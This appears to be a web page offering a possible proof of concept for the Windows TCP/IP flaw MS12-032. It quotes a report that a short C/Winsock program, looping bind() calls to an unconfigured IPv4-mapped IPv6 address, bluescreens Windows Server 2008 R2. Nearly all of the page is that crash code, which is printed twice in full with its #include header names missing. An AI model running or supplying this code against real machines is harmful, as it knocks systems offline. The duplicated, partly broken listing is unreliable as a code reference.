MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege
Microsoft update release http://technet.microsoft.com/en-us/security/bulletin/ms12-032
Possible MS12-032 Proof of concept from StackOverflow thx to @avivra
We discovered that running our application under certain conditions results in a Windows bluescreen. After some investigation we were able to narrow the scenario down to a sample of ~50 lines of C code using Winsock2 APIs. The sample repeatedly binds to an IPv6-mapped invalid IPv4 address. Windows Server 2008 R2 crashes after the sample has run for several seconds. The problem reproduces on different physical machines as well as on virtual machines.
// The program attempts to bind to an IPv6-mapped IPv4 address
// in a tight loop. If the address is not configured on the machine,
// running the program crashes Windows Server 2008 R2 (if the program is 32-bit).
#include
#include
#include
#include
// Socket-option number passed to setsockopt() at level IPPROTO_IPV6 in main(),
// defined by hand here.
// NOTE(review): Windows SDK headers normally supply this macro; the header
// names on the #include lines above were lost on this page, so it is unclear
// which headers the sample was built against.
#define IPV6_V6ONLY 27
/*
 * Initialise Winsock for this process, requesting version 2.2.
 *
 * On failure the WSAStartup() error code is printed and the process exits
 * with status -1; on success the function simply returns. The WSADATA
 * filled in by WSAStartup() is not inspected.
 */
void MyWsaStartup()
{
    WSADATA startupInfo;
    const int status = WSAStartup(MAKEWORD(2, 2), &startupInfo);

    if (status == 0) {
        return;
    }

    printf("WSAStartup failed with error: %d\n", status);
    exit(-1);
}
// Reproduction loop for the crash described on this page: each pass creates a
// dual-stack UDP socket and tries to bind it to the IPv4-mapped IPv6 address
// [::FFFF:169.13.13.13], port 5060, retrying until a bind succeeds.
// The page reports that an unpatched Windows Server 2008 R2 host bluescreens
// after a few seconds of this and labels it a *possible* MS12-032 proof of
// concept, so the link to that bulletin is the author's assumption.
// NOTE(review): `void main()`, `bool` and `sockaddr_in6` without `struct` mean
// this only builds as C++ (or with extra headers); WSACleanup() is never called.
void main()
{
MyWsaStartup();
bool bindSuccess = false;
// Loop ends only when bind() succeeds; a failed bind is the expected case
// when the target address is not assigned to any local interface.
while(!bindSuccess)
{
// A fresh overlapped IPv6/UDP socket is created on every iteration.
SOCKET sock = WSASocket(AF_INET6,
SOCK_DGRAM,
IPPROTO_UDP,
NULL,
0,
WSA_FLAG_OVERLAPPED);
if(sock == INVALID_SOCKET)
{
printf("WSASocket failed\n");
exit(-1);
}
// IPV6_V6ONLY = 0 turns the socket into a dual-stack socket, which is what
// allows an IPv4-mapped address to be passed to bind() below.
DWORD val = 0;
if (setsockopt(sock,
IPPROTO_IPV6,
IPV6_V6ONLY,
(const char*)&val,
sizeof(val)) != 0)
{
printf("setsockopt failed\n");
closesocket(sock);
exit(-1);
}
// Zero the whole address first so bytes 0-9 stay 0, giving the ::FFFF:a.b.c.d
// layout once bytes 10-15 are filled in.
sockaddr_in6 sockAddr;
memset(&sockAddr, 0, sizeof(sockAddr));
sockAddr.sin6_family = AF_INET6;
sockAddr.sin6_port = htons(5060);
// set address to IPV6-mapped 169.13.13.13 (not configured on the local machine)
// that is [::FFFF:169.13.13.13]
sockAddr.sin6_addr.u.Byte[15] = 13;
sockAddr.sin6_addr.u.Byte[14] = 13;
sockAddr.sin6_addr.u.Byte[13] = 13;
sockAddr.sin6_addr.u.Byte[12] = 169;
sockAddr.sin6_addr.u.Byte[11] = 0xFF;
sockAddr.sin6_addr.u.Byte[10] = 0xFF;
// NOTE(review): the length is hard-coded; per the author's own comment it is
// meant to equal sizeof(sockaddr_in6).
int size = 28; // 28 is sizeof(sockaddr_in6)
int nRet = bind(sock, (sockaddr*)&sockAddr, size);
if(nRet == SOCKET_ERROR)
{
// Failure path: the error code is never read (no WSAGetLastError()), the
// socket is closed and the loop retries after 100 ms. The header comment
// calls this a "tight loop", but each retry is spaced by this sleep.
closesocket(sock);
Sleep(100);
}
else
{
// Success path: bind was accepted, so the loop terminates.
bindSuccess = true;
printf("bind succeeded\n");
closesocket(sock);
}
}
}
Possible MS12-032 Proof of concept from StackOverflow thx to @avivra
We discovered that running our application under certain conditions results in a Windows bluescreen. After some investigation we were able to narrow the scenario down to a sample of ~50 lines of C code using Winsock2 APIs. The sample repeatedly binds to an IPv6-mapped invalid IPv4 address. Windows Server 2008 R2 crashes after the sample has run for several seconds. The problem reproduces on different physical machines as well as on virtual machines.
// The program attempts to bind to an IPv6-mapped IPv4 address
// in a tight loop. If the address is not configured on the machine,
// running the program crashes Windows Server 2008 R2 (if the program is 32-bit).
#include
#include
#include
#include
// Socket-option number passed to setsockopt() at level IPPROTO_IPV6 in main(),
// defined by hand here.
// NOTE(review): Windows SDK headers normally supply this macro; the header
// names on the #include lines above were lost on this page, so it is unclear
// which headers the sample was built against.
#define IPV6_V6ONLY 27
/*
 * Initialise Winsock for this process, requesting version 2.2.
 *
 * On failure the WSAStartup() error code is printed and the process exits
 * with status -1; on success the function simply returns. The WSADATA
 * filled in by WSAStartup() is not inspected.
 */
void MyWsaStartup()
{
    WSADATA startupInfo;
    const int status = WSAStartup(MAKEWORD(2, 2), &startupInfo);

    if (status == 0) {
        return;
    }

    printf("WSAStartup failed with error: %d\n", status);
    exit(-1);
}
// Reproduction loop for the crash described on this page: each pass creates a
// dual-stack UDP socket and tries to bind it to the IPv4-mapped IPv6 address
// [::FFFF:169.13.13.13], port 5060, retrying until a bind succeeds.
// The page reports that an unpatched Windows Server 2008 R2 host bluescreens
// after a few seconds of this and labels it a *possible* MS12-032 proof of
// concept, so the link to that bulletin is the author's assumption.
// NOTE(review): `void main()`, `bool` and `sockaddr_in6` without `struct` mean
// this only builds as C++ (or with extra headers); WSACleanup() is never called.
void main()
{
MyWsaStartup();
bool bindSuccess = false;
// Loop ends only when bind() succeeds; a failed bind is the expected case
// when the target address is not assigned to any local interface.
while(!bindSuccess)
{
// A fresh overlapped IPv6/UDP socket is created on every iteration.
SOCKET sock = WSASocket(AF_INET6,
SOCK_DGRAM,
IPPROTO_UDP,
NULL,
0,
WSA_FLAG_OVERLAPPED);
if(sock == INVALID_SOCKET)
{
printf("WSASocket failed\n");
exit(-1);
}
// IPV6_V6ONLY = 0 turns the socket into a dual-stack socket, which is what
// allows an IPv4-mapped address to be passed to bind() below.
DWORD val = 0;
if (setsockopt(sock,
IPPROTO_IPV6,
IPV6_V6ONLY,
(const char*)&val,
sizeof(val)) != 0)
{
printf("setsockopt failed\n");
closesocket(sock);
exit(-1);
}
// Zero the whole address first so bytes 0-9 stay 0, giving the ::FFFF:a.b.c.d
// layout once bytes 10-15 are filled in.
sockaddr_in6 sockAddr;
memset(&sockAddr, 0, sizeof(sockAddr));
sockAddr.sin6_family = AF_INET6;
sockAddr.sin6_port = htons(5060);
// set address to IPV6-mapped 169.13.13.13 (not configured on the local machine)
// that is [::FFFF:169.13.13.13]
sockAddr.sin6_addr.u.Byte[15] = 13;
sockAddr.sin6_addr.u.Byte[14] = 13;
sockAddr.sin6_addr.u.Byte[13] = 13;
sockAddr.sin6_addr.u.Byte[12] = 169;
sockAddr.sin6_addr.u.Byte[11] = 0xFF;
sockAddr.sin6_addr.u.Byte[10] = 0xFF;
// NOTE(review): the length is hard-coded; per the author's own comment it is
// meant to equal sizeof(sockaddr_in6).
int size = 28; // 28 is sizeof(sockaddr_in6)
int nRet = bind(sock, (sockaddr*)&sockAddr, size);
if(nRet == SOCKET_ERROR)
{
// Failure path: the error code is never read (no WSAGetLastError()), the
// socket is closed and the loop retries after 100 ms. The header comment
// calls this a "tight loop", but each retry is spaced by this sleep.
closesocket(sock);
Sleep(100);
}
else
{
// Success path: bind was accepted, so the loop terminates.
bindSuccess = true;
printf("bind succeeded\n");
closesocket(sock);
}
}
}